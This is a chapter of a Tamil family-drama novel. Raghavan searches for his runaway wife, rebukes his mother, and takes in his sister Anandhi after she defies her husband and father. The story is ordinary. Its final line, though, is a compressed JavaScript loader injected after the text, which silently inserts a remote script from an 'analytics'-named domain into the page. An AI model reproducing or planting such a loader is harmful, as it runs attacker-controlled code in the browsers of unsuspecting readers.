ஆமாம்… மெசேஜை அனுப்பிய மறுவினாடியே மலர்விழியின் கைபேசி அணைத்து வைக்கப்பட்டு விட்டது.
மனைவியை தொடர்பு கொள்ள முடியவில்லை என்றானதும், வாய்ஸ் மெசேஜை ஓப்பன் செய்தான் ராகவன்.
அவனை தவிக்க விட்டுவிட்டு மலர்விழி சென்றுவிட்டாள் என்பதை, அது உரக்கச் சொல்லியது. ஓய்ந்து போனான் ராகவன். ‘என்னை நம்பவைத்து ஏமாற்றிவிட்டு செல்ல எப்படியடி உனக்கு மனது வந்தது?’ மனதோடு கேட்டு, மனைவியிடம் மல்லுக்கு நின்றான்.
ராகவன் அருகில் நின்று மலர்விழியின் மேசேஜைக் கேட்ட கோதை, “அன்னைக்கு கோயில்ல வச்சு, உங்க அம்மா மலர்கிட்ட சண்டைக்கு போனாங்களே… ஒருவேளை அதனாலத்தான் மலர் ஊரைவிட்டே போயிருப்பாளோ?” அசமந்தமாக வாயைவிட, பிடித்துக் கொண்டான் ராகவன்.
கோவிலில் நடந்த அத்தனையையும் அக்குவேறு ஆணிவேறாக ராகவனிடம் ஒப்பித்திருந்தார் கோதை. மலர்விழி சொல்லாததால் அத்தனையும் அவனுக்கு புதிதாக இருக்க, தன் அம்மாவா இப்படி பேசியது என்று திகைத்துப் போனான் ராகவன்.
மனதளவில் எல்லோரும் நெருக்கடி கொடுத்து மலரை இந்த முடிவை எடுக்க தூண்டிவிட்டது புரிந்தது. கோபமாக தன் வீட்டுக்கு வந்தான். ஹாலில் இருந்த அம்மாவிடம், “சந்தோஷமா… எம்பொண்டாட்டி என்னை விட்டு, இந்த ஊரைவிட்டே போய்ட்டா, இப்போ உங்களுக்கு சந்தோஷமா?” என்று கேட்டவன்,
“உங்க பொண்ணுங்க வாழ்க்கை இனி சரியாகிடும். இப்போ, உங்க பையன், வாழ்க்கையை தொலைச்சிட்டு நிக்குறானே, ஒரு அம்மாவா அதுக்கு என்ன செய்யப் போறீங்க?” என்று கேட்டு, புருவத்தை உயர்த்தினான்.
திடீரென்று கேட்ட விஷயத்தை கிரகித்துக் கொள்ள, தெய்வானைக்கு சில வினாடிகள் தேவைப்பட்டது. விஷயம் புரிந்ததும் சட்டென்று இதழ்கள் சந்தோஷத்தில் விரிய,
“உன்னைப் பிடிச்ச ஏழரை இன்னையோட தொலைஞ்சதுன்னு நெனச்சிக்கோ ராகவா. உனக்கென்ன, ராஜாவாட்டம் இருக்குற. அம்மா, நல்லப் பொண்ணாப் பாத்து கல்யாணம் பண்ணி வைக்கிறேன் டா.” மகனுக்கு அருகில் வந்து உற்சாகமாக சொன்னார்.
“சபாஷ்… பிரச்சனைன்னு வந்ததும், இதே வார்த்தையை உங்க பொண்ணுங்க கிட்டயும் நீங்க சொல்லியிருக்கலாமே? அதை விட்டுட்டு, கண்டவங்க கால்ல கூட, அவங்க வாழ்க்கைக்காக விழத் தயாரானீங்களே, ஏன்?” தாயை பார்வையால் துளைத்தபடி கேட்டான் ராகவன்.
“என்ன பேச்சு பேசுற ராகவா? உனக்கு புத்தி கித்தி பிரண்டு போயிடிச்சா?” முகத்தை சுழித்தார் தெய்வானை.
“கல்யாணம் ஆன பையன் கிட்ட, உன் மனைவியை விட்டுட்டு வா, வேற கல்யாணம் பண்ணி வைக்கிறேன்னு, உங்களால தைரியமா சொல்ல முடியும் போது, பொண்ணுங்க கிட்ட மட்டும் ஏன் உங்களால சொல்ல முடியாது?” சவாலாக கேட்டான் ராகவன்.
“பொண்ணுங்க வாழ்க்கை வேற, பசங்க வாழ்க்கை வேற டா.” எப்படி சொல்வதென்று தெரியாமல், குழப்பியடித்தார் தெய்வானை.
“ஏன்? பொண்ணுங்க மட்டும் தான் வாழ்க்கை முழுமைக்கும் ஒரேத் துணையோடு வாழணும்னு நினைப்பாங்களா? பசங்க நாங்க நினைக்க மாட்டோமா என்ன?” விட்டேனா பார் என்று, தன் கோபத்தை எல்லாம் கேள்வியாக்கி தெய்வானையை சுழற்றியடித்தான் ராகவன்.
அங்கிருந்த ஆனந்தியும், ஜெயந்தியும் ராகவனின் கோபத்தைக் கண்டு அவனை நெருங்கத் தயங்கினார்கள். குமாரசாமி வீட்டில் இல்லை.
“பரவாயில்ல, எல்லாரும் நினைச்சத சாதிச்சிட்டீங்க, இந்த முட்டாளும் அதுக்கு இடம் கொடுத்துட்டா.” விரக்திக் குரலில் சொன்ன ராகவன்,
“என்னால, உன் வாழ்க்கைல குழம்பம் வந்ததுக்கு மன்னிச்சிடு க்கா” என்று ஆனந்தியிடம் சொன்னான். அருகே நின்றிருந்த தங்கையிடம், “நீங்களும் தான் மேடம், மன்னிச்சிடுங்க” என்று அவள் தலையைப் பிடித்து ஆட்டிவிட்டு, வீட்டை விட்டு வெளியே செல்லத் தொடங்கினான்.
பின்னர், என்ன நினைத்தானோ, திரும்பி வந்தவன், “இந்த வாழ்க்கைல, என் துணை மலர்விழி மட்டும் தான். அவ எங்கூட இருந்தாலும், இல்லைன்னாலும் அவமட்டும் தான் எனக்கு. வேற ஏதாவது எண்ணத்துல எங்கிட்ட யாராவது வந்தீங்க… அப்புறம் நடக்குறதுக்கு நான் பொறுப்பில்ல.” கிட்டத்தட்ட உறுமி விட்டு அங்கிருந்து வெளியேறியிருந்தான்.
இந்த பத்து நாட்களும், மலர்விழி போயிருக்கக் கூடும் என்று நினைத்த அத்தனை இடங்களையும் சல்லடை போட்டுத் தேடியும் கூட, அவள் கிடைக்கவே இல்லை.
சோர்ந்து போன ராகவன், போலீஸில் ஒரு புகாரை பதிவு செய்து விட்டு, தனிப்பட்ட முறையில் ஒரு துப்பறியும் நிறுவனத்திடமும் மனைவியை தேடும் பணியை ஒப்படைத்துவிட்டு உட்கார்ந்திருக்கிறான்.
ஆமாம்… மலர்விழியும், அவனும் வாழ்ந்த அதே வீட்டில் தான் இருக்கிறான் ராகவன்.
பள்ளியில், அவள் சான்றிதழ்களை திரும்ப வாங்கியிருந்த விதத்திலேயே, திட்டமிட்டு அங்கிருந்து சென்றுவிட்டாள் என்பது தெளிவாக புரிந்தது.
“நீ மலரை காதலிக்காமலேயே, கல்யாணம் பண்ணாமலேயே இருந்துருக்கலாம் ராகவா. அந்த பிள்ளை நிம்மதியா, சந்தோஷமா இங்க எங்கயாவது வேலை பாத்துட்டு இருந்துருக்கும். இப்போ, உங்கண்ணுல படக்கூடாதுன்னு எங்க போய், என்ன பாடு படுதோ தெரியல?”
ராகவனோடு சேர்ந்து மலர்விழியைத் தேடி சோர்ந்து போன சிதம்பரம், ஆதங்கமாக சொல்லிய வார்த்தைகள், ராகவனின் காதுகளில் ரீங்காரமிட்டு, மனதை பதைபதைக்கச் செய்தது. கூடவே, திருமண வாழ்வில் மிக மோசமாக தோல்வியுற்றதை அவனுக்கு ஞாபகப்படுத்திக் கொண்டேயிருந்தது.
அந்த தோல்வியை தனக்கு பரிசளித்தவள், கையில் கிடைத்தால் கடித்து குதறி விடும் கோபத்தில் ராகவன் இருக்க,
“முடியாது… முடியாது… முடியாது, என்னால உங்ககூட, அந்த வீட்டுக்கு வரமுடியாது.” அழுத்தம் திருத்தமாக கணவனிடம் சொல்லிக் கொண்டிருந்தாள் ஆனந்தி.
ஆமாம்… மனைவி மக்களை தன்னோடு அழைத்துச் செல்ல வந்திருந்த மாதவனிடம் தான் சொல்லிக் கொண்டிருந்தாள் ஆனந்தி.
மலர்விழி மகனை விட்டு சென்றுவிட்டாள் என்ற தகவலை தெய்வானை, மாதவனின் அம்மாவுக்கு தெரியப்படுத்த, மனைவி மக்களை அழைத்து வர மாதவனுக்கு அனுமதி கிடைத்து விட்டது.
ஆனால் மலர்விழி சென்ற உடனே, அங்கேவர மாதவனுக்கு குற்ற உணர்ச்சியாக இருந்தது. அதோ, இதோ என்று சொல்லிச் சொல்லி, ஒருவழியாக இன்று வந்து சேர்ந்திருக்கிறான்.
மனைவியின் பதில் மாதவனுக்கு அதிர்ச்சியைத் தந்தது. அவன் பதில் பேச ஆரம்பிக்கும் முன்னர் இடைபுகுந்த தெய்வானை, “புருஷன் கூப்பிட்டா கிளம்பி போறதை விட்டுட்டு, அசடு மாதிரி என்ன பேசிட்டு இருக்கிற ஆனந்தி?” என்று மகளை அதட்டினார்.
“இவங்க இஷ்டத்துக்கு போன்னு சொன்னதும் போறதுக்கும், வா ன்னு சொன்ன உடனே பல்லக் காட்டிக்கிட்டு பின்னாடி கிளம்பி போகவும், நான் ஒண்ணும் இவங்க வீட்டு நாய் குட்டி இல்ல ம்மா.” ஆனந்தியிடமிருந்து பதில் சூடாக வந்தது.
“இனிமே ஒருதடவை இப்படி நடக்காம பாத்துக்கறேன். இப்போ வா ஆனந்தி, நம்ம வீட்டுக்கு போலாம்.” மனைவியின் பிறந்த வீட்டு உறவுகளுக்கு நடுவே அவளை சமாதானம் செய்ய முயல்வதே ஒருமாதிரியாக இருக்க, மெல்லிய குரலில் மனைவியை அழைத்தான் மாதவன்.
“இல்ல, அது என் வீடு இல்ல. அது உங்க அம்மா வீடு. என் வீடா இருந்திருந்தா, எப்படி என்னையும் எம்பிள்ளைகளையும் வீட்டை விட்டு அனுப்ப முடியும்?” தனது இத்தனை நாள் மனக்குமுறலை கொட்டினாள் ஆனந்தி.
“சரி… அந்த வீட்டுக்கு போகவேண்டாம், நாம தனியா இருக்கலாம்.” எப்படியாவது மனைவியை உடன் அழைத்துச் சென்றேயாக வேண்டும் என்ற உந்துதலில் வாக்குறுதியை அள்ளித் தெளித்தான் ராகவன்.
“ஹா… இதை நீங்க மொதல்லயே செய்துருக்கணும் சார்” என்று கேலி செய்த ஆனந்தி,
“எதை நம்பி உங்ககூட வரமுடியும்? நாளைக்கே என்தம்பி கதிர், யாரையாவது காதலிச்சு, கல்யாணம் பண்ணிட்டு வந்து நிக்கலாம். அப்போ, அதையும் காரணம் காட்டி, என்னை வீட்டைவிட்டு அனுப்ப மாட்டீங்கன்னு என்ன உத்தரவாதம் இருக்கு?”
“இப்பிடி பேசினா எப்படி ஆனந்தி?” மனைவியிடமிருந்து இப்படி ஒரு கேள்வியை எதிர்பாராத மாதவன் அலுத்துக் கொண்டான்.
அதை பொறுத்துக் கொள்ள முடியாமல், “நானும் பாத்துட்டே இருக்கேன், கூட கூட பேசிட்டே இருக்குற. நீ கிளம்பு மொதல்ல.” உத்தரவு போலச் சொன்னார் குமாரசாமி.
“உதைச்சு விளையாட, எம்புள்ள என்ன ஃபுட்பாலான்னு நீங்க கேட்டுருக்கணும் ப்பா. ஆனா, எங்க? அதான் எனக்காக நானே பேசிக்கிறேன்.” ஆதங்கம் மேலிட தகப்பனிடம் சொன்ன ஆனந்தி,
“எனக்குன்னு சம்பாத்தியம் இல்லாம, உங்க நிழல்ல வாழ்ந்ததாலத் தானே ரொம்ப ஈசியா என்னை நினைச்சிட்டீங்க நீங்க? இனிமே, எனக்குன்னு ஒரு வேலையைத் தேடிக்காம இந்த வீட்டை விட்டு எங்கயும் நான் வர்றதா இல்ல. அதுக்கு எவ்வளவு நாளானாலும் பரவாயில்ல” என்றாள் கணவனிடம் உறுதியாக.
“அதுக்கு, நான் உன்னை இங்க இருக்க அனுமதிக்கனுமே, பிரச்சனை முடிஞ்சுதா, புருஷன் பின்னாடி போனமான்னு இல்லாம, வீர வசனம் பேசிகிட்டு. எதைச் செய்தாலும் உங்க வீட்டுல போய் செய். கிளம்பு… கிளம்பு…” என்றார் குமாரசாமி கோபமாக.
தகப்பனை அடிபட்ட பார்வை பார்த்த ஆனந்தி, அடுத்த வினாடியே தன் மகனை இடுப்பிலும், மகளை கையிலுமாக பிடித்துக் கொண்டு வீட்டை விட்டு வெளியே இறங்கி விட்டாள்.
தெருவில் நிற்கும் மாதவனின் காருக்கு தான் செல்கிறாள் என்று எல்லோரும் நினைத்திருக்க, அதையும் தாண்டி நடந்த ஆனந்தி, ராகவனின் வீட்டுக்கு முன் வந்து நின்று, “ராகவா” என்று அழைத்தாள்.
கண்மூடி அமர்ந்து, மனதிற்குள் மனைவியோடு கத்திச் சண்டை போட்டுக் கொண்டிருந்த ராகவன், அந்நேரத்திலும் கூட, “உள்ள வா க்கா” என்றான் வரவேற்கும் விதமாக.
வந்தவள், “ராகவா, நானும் எம்பிள்ளைகளும் கொஞ்சநாள் உங்கூட, இந்த வீட்டுல இருக்கலாமா?” என்றாள் லேசான தழுதழுக்கும் குரலில்.
“இல்ல… உன் அக்காவை எங்கூட அனுப்பி வை மாப்ள. அவ என்னென்னவோ சொல்லுறா, எது வேணாலும் செய்துக்கட்டும், ஆனா எங்கூட வரச்சொல்லு.”
மனைவி பின்னோடு வந்திருந்த மாதவன், விஷயம் வேறுதிக்கில் பயணிப்பதில் அதிர்ச்சியாகி படபடத்தான். ராகவன் புரியாமல் பார்க்க, நடந்தவற்றை சுருக்கமாக மாதவனே சொன்னான்.
“ஏன்? இந்த அளவுக்கு கூட பொண்ணுங்களுக்கு சுயமரியாதை இருக்கக் கூடாதா, என்ன?” மாதவனைப் பார்த்து அழுத்தமானக் குரலில் கேட்ட ராகவன்,
“நீ எவ்வளவு நாள் வேணும்னாலும் எங்கூடவே இரு க்கா. நீ நினைச்சது நடக்க, ஒரு தம்பியா என்னாலான எல்லா உதவியும் செய்றேன்.”
உறுதியானக் குரலில் சொன்ன ராகவன், அக்காவின் இடுப்பிலிருந்த அவள் மகனை, தன் கைகளில் ஏந்திக் கொண்டான்…
;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);